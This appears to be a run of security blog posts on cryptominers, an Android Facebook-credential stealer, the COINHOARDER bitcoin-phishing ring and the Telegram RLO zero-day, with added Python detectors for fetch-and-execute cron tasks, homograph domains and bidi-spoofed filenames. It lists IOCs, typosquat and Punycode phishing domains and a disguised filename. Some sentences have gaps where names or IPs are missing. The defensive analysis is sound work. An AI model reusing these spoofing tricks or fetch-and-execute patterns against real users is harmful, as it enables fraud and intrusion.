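        if VENDOR_LURE.search(name) and not VENDOR_DIR.search(action):
            reasons.append("vendor-lookalike name")
        if reasons:
            hits.append((name, reasons))
    return hits


def suspicious_cron(crontab):
    """Return [(command, [reasons]), ...] for cron entries that fetch-and-execute."""
    hits = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        cmd = line.split(None, 5)[-1]          # drop the five schedule fields
        reasons = []
        if DOWNLOAD_CRADLE.search(cmd) and PIPE_TO_SHELL.search(cmd):
            reasons.append("pipe to shell")
        elif DOWNLOAD_CRADLE.search(cmd) and TEMP_PATH.search(cmd):
            reasons.append("download to temp and execute")
        if reasons:
            hits.append((cmd, reasons))
    return hits


if __name__ == "__main__":
    for name, why in suspicious_tasks(SCHTASKS_CSV):
        print("task", name, why)
    for cmd, why in suspicious_cron(CRONTAB):
        print("cron", cmd, why)
```

The vendor-name heuristic is the one worth tuning per estate: a task called “Update service for Oracle” whose action is a powershell download cradle or a binary under \Windows\Temp is the pattern the post describes, whereas a genuine vendor updater runs a signed binary from the vendor's own directory.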


Use of cryptocurrency mining malware is a popular tactic leveraged by financially motivated cyber criminals to make money from victims. We've observed one threat actor mining around 1 XMR per day, demonstrating the potential profitability and the reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky than ransomware operations, since victims may not even know the activity is occurring beyond a slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so that cyber criminals maximize their reach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial stage of the attack cycle, when attackers attempt to deliver the first-stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

Indicators of Compromise

MD5 Name
3421A769308D39D4E9C7E8CAECAF7FC4 cranberry.exe/logic.exe
B3A831BFA590274902C77B6C7D4C31AE xmrig.exe/yam.exe
26404FEDE71F3F713175A3A3CEBC619B 1.ps1
D3D10FAA69A10AC754E3B7DDE9178C22 2.ps1
9C91B5CF6ECED54ABB82D1050C5893F2 info3.ps1
3AAD3FABF29F9DF65DCBD0F308FF0FA8 info6.ps1
933633F2ACFC5909C83F5C73B6FC97CC lower.css
B47DAF937897043745DF81F32B9D7565 lib.css
3542AC729035C0F3DB186DDF2178B6A0 bootstrap.css

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Author: Rakesh Sharma

Android Malware Harvests Facebook Account Details

New Fakeapp variants log into Facebook accounts to harvest user credentials directly from victims’ devices.

Recently, there have been reports of mobile threats stealing Facebook login credentials, such as user names and passwords. We’ve encountered new Android malware (detected as Android.Fakeapp) that takes a more aggressive approach: logging into Facebook accounts and harvesting account details directly from victims’ devices. The majority of the victims are located in the Asia-Pacific region.

The malware we’ve encountered was sourced from third-party markets. The apps target English speakers.

Once installed, the malicious app immediately hides itself from the home screen, leaving only a service running in the background. This service takes the following steps to steal details from a Facebook user’s account:
  • It checks for a target Facebook account by submitting the International Mobile Equipment Identity (IMEI) to the command and control (C&C) server.
  • If no account can be collected, it verifies that the app is installed on the device.
  • It then launches a spoofed Facebook login user interface (UI) to steal user credentials.
  • It periodically displays this login UI until credentials are successfully collected.
Figure 1. Spoofed Facebook login dialog

Using JavaScript from a hidden WebView, the threat silently logs into the compromised Facebook account. The malware hides the WebView by setting the display to be almost completely transparent (Figure 2).

Figure 2. Setting the display to be transparent

It then ensures that a CAPTCHA isn’t presented. If it is, it sends the event to the C&C server, clears caches and cookies, and retries later.

Figure 3. Backing out of a CAPTCHA challenge

Once the malware is logged into the Facebook page, it can leverage a wide range of capabilities to follow links and scrape the personal data of the victim and their friends, sending it back to the C&C server. This includes:

  • General top-level data: Facebook account, user, password, device IMEI
  • Profile: Work, education, location, contacts, basic info, nicknames, relationships, family, bio
  • Activities: Check in, events, friends, groups, likes, pages, posts

The functionality that crawls the Facebook page has a surprising level of sophistication. The crawler has the ability to use the search functionality on Facebook and collect the results. Additionally, to harvest information that is shown using dynamic web techniques, the crawler will scroll the page and pull content via Ajax calls (Figures 4 and 5).

Figure 4. Scrolling the page
Figure 5. Collecting dynamic content with Ajax

We advise users to follow these best practices to stay protected from mobile threats:

  • Keep your software up to date
  • Refrain from downloading apps from unfamiliar sites and only install apps from trusted sources
  • Pay close attention to the permissions requested by apps
  • Install a suitable mobile security app, such as Norton, to protect your device and data
  • Make frequent backups of important data

Author: Martin Zhang, Shaun Aimoto

COINHOARDER: Tracking a Ukrainian Bitcoin Phishing Ring DNS Style

This post is authored by Jeremiah O’Connor and Dave Maynor with contributions from Artsiom Holub and Austin McBride. 


Cisco has been tracking a bitcoin theft campaign for over 6 months. The campaign was discovered internally and researched with the aid of an intelligence sharing partnership with Ukraine Cyberpolice. The campaign was very simple and after initial setup the attackers needed only to continue purchasing Google AdWords to ensure a steady stream of victims. This campaign targeted specific geographic regions and allowed the attackers to amass millions in revenue through the theft of cryptocurrency from victims. This campaign demonstrates just how lucrative these sorts of malicious attacks can be for cybercriminals. Additionally, the revenue generated by these sorts of attacks, can then be reinvested into other cybercriminal operations.


On February 24, 2017, Cisco observed a massive phishing campaign hosted in Ukraine targeting the popular Bitcoin wallet site, with a magnitude of over 200,000 client queries. This campaign was unique in that adversaries leveraged Google AdWords to poison user search results in order to steal users’ wallets. Since Cisco observed this technique, it has become increasingly common in the wild, with attackers targeting many different crypto wallets and exchanges via malicious ads.

Cisco identified an attack pattern in which the threat actors behind the operation would establish a “gateway” phishing link that would appear in search results among Google Ads. When searching for crypto-related keywords such as “blockchain” or “bitcoin wallet,” the spoofed links would appear at the top of search results. When clicked, the link would redirect to a “lander” page and serve phishing content in the native language of the geographic region of the victim’s IP address.


The reach of these poisoned ads can be seen when analyzing DNS query data. In February 2017, Cisco observed spikes in DNS queries for the fake cryptocurrency websites where upwards of 200,000 queries per hour can be seen during the time window the ad was displayed. Here are two examples.


DNS Statistics for block-clain[.]info

The domain block-clain[.]info was used as the initial “gateway” victims would first visit. Victims would immediately be redirected to blockchalna[.]info, the landing page where the actual phishing content was hosted. These fraudulent sites are mostly hosted on bulletproof hosting providers based in Europe.

Here is what the actual lander phishing site looked like. Note how similar and convincing it is compared to a real site, with the exception of the URL:


After discovering these domains and the activity on Google Adwords, Cisco implemented a system to flag similar domains as malicious. This resulted in DNS requests being blocked to said domains. Additionally, Cisco researchers were able to track and monitor related networks and info, such as WHOIS registrant data.

This information allowed Cisco to use DNS graph traversal techniques to uncover other phishing domains associated with the initial site. In this example, we can see the registrant dsshvxcnbbu@yandex[.]ru, which is also associated with many other phishing sites:

Cisco also monitored the networks these domains are hosted on. Here is a snapshot of 2 of the recently active IP addresses for this campaign, and, and the ASN associated with these domains, Highload Systems, in Ukraine.

We can see the Second Level Domain (SLD) strings in these domains follow a similar pattern of targeting with many permutations of the string “blockchain”, along with co-occurrences of “http”, “https”, “wallet” in the SLD string. Here is a graph visualization of the domains on these infrastructures:


One of the most interesting facets to these attacks are the geographic regions of the victims. Using data from Umbrella Client Requester Distribution queries to these malicious domains, we can see a significant number of DNS resolution requests coming from countries such as Nigeria, Ghana, Estonia and many more.

This threat actor appears to be standing up phishing pages to target potential victims in African countries and other developing nations, where banking can be more difficult and local currencies much more unstable compared to the digital asset. Additionally, attackers have taken notice that users in countries whose first language is not English make for potentially easier targets. Based on the number of queries, this campaign is one of the biggest targeting to date. has been very proactive in supporting users. Kristov Atlas, a security and privacy engineer at, has even gone so far as to say “phishing is one of our top areas of concern in protecting our users.”


Cisco has evidence the COINHOARDER group has been actively pilfering Bitcoin since at least 2015. Based on our findings, we estimate this group has stolen tens of millions of USD in cryptocurrency. While working with Ukraine law enforcement, we were able to identify the attackers’ Bitcoin wallet addresses and thus could track their activity for the period between September 2017 and December 2017. In this period alone, we quantified around $10M stolen. In one specific run, they made $2M within a 3.5-week period. Here we have a screenshot of one of the wallets, 19yAR4yvGcKV3SXUQhKnhi43m4bCUhSPc, related to this actor group, which has received a total of $1,894,433.09.

While identifying the individual who owns a specific wallet is extremely difficult, we still can look for open source intelligence surrounding the wallet. In December 2017, Cisco found posts on Reddit and Stack Exchange with addresses associated with stolen funds from this campaign, 13wahvu3FP8LK8P51UmEkhBUhyC7mzkrn3.

The wallet address in the screenshot above was also mentioned in a Reddit post in October 2017.

Based on our findings associated with this syndicate, we estimate the COINHOARDER group to have netted over $50M over the past three years. It is important to note that the price of Bitcoin shot up drastically over 2017, starting around $1,000 in January and hitting a high point just under $20,000 in December. While criminals were able to profit from this, it also adds a new level of complexity for criminals converting their cryptocurrency funds to a fiat currency like US dollars. The historic price of Bitcoin during the height of this campaign would have made it very difficult to move these ill-gotten finances easily.


Ukraine is a hotbed for many types of attacks and a home for known bulletproof hosting providers. In the past year, Cisco has witnessed a substantial rise in financially motivated campaigns coming from and targeting this region. One of Cisco’s goals is to collaborate with countries worldwide and use our global visibility on attacks to assess their security posture and help improve it.

Some other observed IPs are and, which host domains targeting many currencies using IDN and SSL certs and are hosted on VServer in Ukraine. We also observed AS 58271 hosting multiple search engine poisoning attacks on Google and Bing:


Cisco has observed this threat actor evolve over time. Not only have we seen the COINHOARDER group abuse Google Adwords to generate traffic to their phishing servers, but we have also observed this group evolve to make their sites appear more legitimate. A few months after we began tracking this particular group, we observed them starting to use SSL certs issued by Cloudflare and Let’s Encrypt. SSL certificate abuse has been a rising trend among phishing campaigns in general. Below is an example of a wildcard SSL certificate issued by Cloudflare for the domain bockchain[.]info.

Here is an example of one of these SSL certificates issued by Let’s Encrypt associated with this campaign and the site blockcharin[.]info.

The COINHOARDER group has made heavy use of typosquatting and brand spoofing in conjunction with SSL-signed phishing sites in order to appear convincing. We have also observed the threat actors using internationalized domain names. These domains are used in what are called homograph attacks, where an international letter or symbol looks very similar to one in English. Here are some examples from this campaign.

The Punycode (internationalized) version is on the left, the translated (homographic) version on the right:

xn--blockchan-d5a[.]com → blockchaìn[.]com

xn--blokchan-i2a[.]info → blokchaín[.]info

These attacks can be nearly impossible to spot with the human eye, especially when delivered on a mobile platform, and using these techniques helps coax users into handing over their funds.
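The Punycode pairs above, together with the “blockchain” permutations noted earlier (bockchain, blockcharin, block-clain, blockchalna), can be screened automatically. The following is an added example, not Cisco’s code or tooling: it decodes an `xn--` label with Python’s built-in `punycode` codec, strips diacritics to get the “skeleton” a user actually perceives, and compares that skeleton against a protected brand string with an edit distance. The brand list, the distance threshold of 2, and the `blockchain-wallet-https[.]info` input are assumptions constructed for the demonstration; the other domains are the ones named on this page.

```python
import unicodedata

# Brand strings the page's phishing domains imitate (assumed list for this example).
PROTECTED_BRANDS = ("blockchain",)
MAX_TYPO_DISTANCE = 2  # assumed threshold: 1-2 edits covers the permutations seen above


def decode_label(label):
    """Return the Unicode form of one DNS label; 'xn--' labels carry Punycode."""
    if label.lower().startswith("xn--"):
        return label[4:].encode("ascii").decode("punycode")
    return label


def skeleton(text):
    """Collapse look-alike letters: NFKD decomposition, then drop combining marks.
    'blockchaìn' -> 'blockchain', which is what the eye reads."""
    decomposed = unicodedata.normalize("NFKD", text)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch)).lower()


def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze_domain(domain):
    """Inspect the second-level label of a (possibly defanged) domain and report
    why a defender should treat it as a brand impersonation, if at all."""
    labels = domain.replace("[.]", ".").lower().split(".")
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    rendered = decode_label(sld)
    skel = skeleton(rendered)
    non_ascii = [c for c in rendered if ord(c) > 127]

    findings = []
    if non_ascii:
        findings.append("idn")  # internationalized label: always worth a second look
    for brand in PROTECTED_BRANDS:
        if skel == brand and non_ascii:
            findings.append("homograph:" + brand)       # reads as the brand, is not
        elif skel != brand and levenshtein(skel, brand) <= MAX_TYPO_DISTANCE:
            findings.append("typosquat:" + brand)       # bockchain, blokchain, ...
        elif skel != brand and brand in skel:
            findings.append("brand-embedded:" + brand)  # blockchain-wallet-https...
    return {"domain": domain, "rendered": rendered, "skeleton": skel, "findings": findings}


if __name__ == "__main__":
    samples = [
        "xn--blockchan-d5a[.]com",      # from the page: renders as blockchaìn
        "xn--blokchan-i2a[.]info",      # from the page: renders as blokchaín
        "bockchain[.]info",             # from the page
        "blockcharin[.]info",           # from the page
        "block-clain[.]info",           # from the page
        "blockchalna[.]info",           # from the page
        "blockchain-wallet-https[.]info",  # constructed for this example
        "blockchain[.]info",            # control: the brand itself, no finding
    ]
    for d in samples:
        r = analyze_domain(d)
        print(f"{d:34} -> {r['rendered']:14} skeleton={r['skeleton']:26} {r['findings']}")
```

The skeleton step is what makes the homograph case catchable: a plain string comparison never matches `blockchaìn` against `blockchain`, but after NFKD and removal of combining marks the two are identical while the raw label still contains a non-ASCII code point, which is exactly the signature of a homograph. Production systems should widen the brand list, add the confusable mappings from Unicode TR39 for letters that do not decompose (Cyrillic `а` for Latin `a`), and feed the result into DNS-layer blocking as the article describes.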


Crypto assets have proven to be a new, valuable financial commodity targeted by varying degrees of cyber criminals. In 2017, we observed phishers advance their tactics by utilizing new attack vectors such as Google Adwords combined with the use of IDNs and rogue SSL certificates to improve their probability of success, and generate millions in profit.

What is clear from the COINHOARDER campaign is that cryptocurrency phishing via Google Adwords is a lucrative attack on users worldwide. Phishers are significantly improving their attack techniques by moving to SSL and employing IDNs to fool victims into handing over their credentials. We can expect to see more of these realistic-looking phishes with Let’s Encrypt releasing full wildcard certificate support at the end of this month. Cisco will continue to monitor the landscape and coordinate with international law enforcement teams in 2018 to help protect users and organizations.


The following IP addresses are known to have been used in these phishing attacks:


Author: Talos Group

Hackers Exploit ‘Telegram Messenger’ Zero-Day Flaw to Spread Malware

A zero-day vulnerability has been discovered in the desktop version of the end-to-end encrypted Telegram messaging app that was being exploited in the wild to spread malware that mines cryptocurrencies such as Monero and ZCash.

The Telegram vulnerability was uncovered by security researcher Alexey Firsh from Kaspersky Lab last October and affects only the Windows client of Telegram messaging software.

The flaw has been actively exploited in the wild since at least March 2017 by attackers who tricked victims into downloading malicious software onto their PCs that used their CPU power to mine cryptocurrencies or served as a backdoor for attackers to remotely control the affected machine, according to a blogpost on Securelist.

Here’s How Telegram Vulnerability Works

The vulnerability resides in the way the Telegram Windows client handles the RLO (right-to-left override) Unicode character (U+202E), which is used for encoding text in languages that are written from right to left, like Arabic or Hebrew.

According to Kaspersky Lab, the malware creators used a hidden RLO Unicode character in the file name that reversed the order of the characters, thus renaming the file itself, and sent it to Telegram users.

For example, when an attacker sends a file named “photo_high_re*U+202E*gnp.js” in a message to a Telegram user, the file’s name is rendered on the user’s screen with the last part flipped.

Therefore, the Telegram user will see an incoming PNG image file (as shown in the below image) instead of a JavaScript file, misleading them into downloading a malicious file disguised as an image.
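To make the rendering trick concrete and show the check a client or mail/chat gateway can apply, here is an added example (not Kaspersky’s or Telegram’s code). It simulates how a naive renderer draws text after a U+202E override (reversed until a U+202C pop or the end of the string, a simplification of the full Unicode bidi algorithm), compares the apparent extension with the real one, and produces a display name in which every bidi control character is made visible. The file name is the one quoted above; the `holiday.png` control input is constructed.

```python
import os

# Unicode bidirectional control characters that can reorder how a name is displayed
# while being invisible themselves. U+202E (RLO) is the one used in the Telegram case.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
    "\u200e": "LRM", "\u200f": "RLM",
}


def simulate_display(name):
    """Approximate what the user sees: characters after an RLO are drawn right-to-left
    (i.e. reversed) until a PDF (U+202C) or the end of the string. Other controls are
    dropped as invisible. This is a deliberate simplification of UAX #9 that is exact
    for the all-Latin file names discussed here."""
    out = []
    i = 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            end = name.find("\u202c", i + 1)
            if end == -1:
                out.append(name[i + 1:][::-1])
                break
            out.append(name[i + 1:end][::-1])
            i = end + 1  # skip the PDF itself
            continue
        if ch in BIDI_CONTROLS:
            i += 1
            continue
        out.append(ch)
        i += 1
    return "".join(out)


def safe_display_name(name):
    """Mitigation: never render bidi controls raw; show them as <U+XXXX> markers."""
    return "".join(f"<U+{ord(c):04X}>" if c in BIDI_CONTROLS else c for c in name)


def inspect_filename(name):
    """Return what the file name looks like, what it really is, and whether the two
    disagree. A defender would block or warn on 'suspicious' before the download."""
    controls = [(i, BIDI_CONTROLS[c]) for i, c in enumerate(name) if c in BIDI_CONTROLS]
    displayed = simulate_display(name)
    true_ext = os.path.splitext(name)[1].lower()        # what the OS will execute
    apparent_ext = os.path.splitext(displayed)[1].lower()  # what the user believes
    return {
        "displayed": displayed,
        "true_extension": true_ext,
        "apparent_extension": apparent_ext,
        "bidi_controls": controls,
        "suspicious": bool(controls) or true_ext != apparent_ext,
        "safe_name": safe_display_name(name),
    }


if __name__ == "__main__":
    # The file name from the article, with the literal U+202E in place of *U+202E*.
    for fname in ["photo_high_re\u202egnp.js", "holiday.png"]:  # second one constructed
        r = inspect_filename(fname)
        print(f"shown as   : {r['displayed']}")
        print(f"really is  : {r['true_extension']}  (appears {r['apparent_extension']})")
        print(f"controls   : {r['bidi_controls']}")
        print(f"safe name  : {r['safe_name']}")
        print(f"suspicious : {r['suspicious']}\n")
```

Two independent signals are checked on purpose: the presence of any bidi control character (sufficient on its own to warn, since legitimate file names almost never contain them) and a mismatch between the real and apparent extension (which also catches double-extension tricks that use no Unicode at all). Rendering the control as `<U+202E>` rather than stripping it keeps the evidence visible to the user and to log reviewers.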

“As a result, users downloaded hidden malware which was then installed on their computers,” Kaspersky says in its press release published today.

Kaspersky Lab reported the vulnerability to Telegram and the company has since patched the vulnerability in its products, as the Russian security firm said: “at the time of publication, the zero-day flaw has not since been observed in messenger’s products.”

Hackers Used Telegram to Infect PCs with Cryptocurrency Miners


During the analysis, Kaspersky researchers found several scenarios of zero-day exploitation in the wild by threat actors. Primarily, the flaw was actively exploited to deliver cryptocurrency mining malware, which uses the victim’s PC computing power to mine different types of cryptocurrency including Monero, Zcash, Fantomcoin, and others.

While analyzing the servers of malicious actors, the researchers also found archives containing a Telegram’s local cache that had been stolen from victims.

In another case, cybercriminals successfully exploited the vulnerability to install a backdoor trojan that used the Telegram API as a command and control protocol, allowing hackers to gain remote access to the victim’s computer.

“After installation, it started to operate in a silent mode, which allowed the threat actor to remain unnoticed in the network and execute different commands including the further installation of spyware tools,” the firm added.

Firsh believes the zero-day vulnerability was exploited only by Russian cybercriminals, as “all the exploitation cases that [the researchers] detected occurring in Russia,” and a lot of artifacts pointed towards Russian cybercriminals.

The best way to protect yourself from such attacks is not to download or open files from unknown or untrusted sources.

The security firm also recommended that users avoid sharing any sensitive personal information in messaging apps and make sure to have good antivirus software from a reliable company installed on their systems.
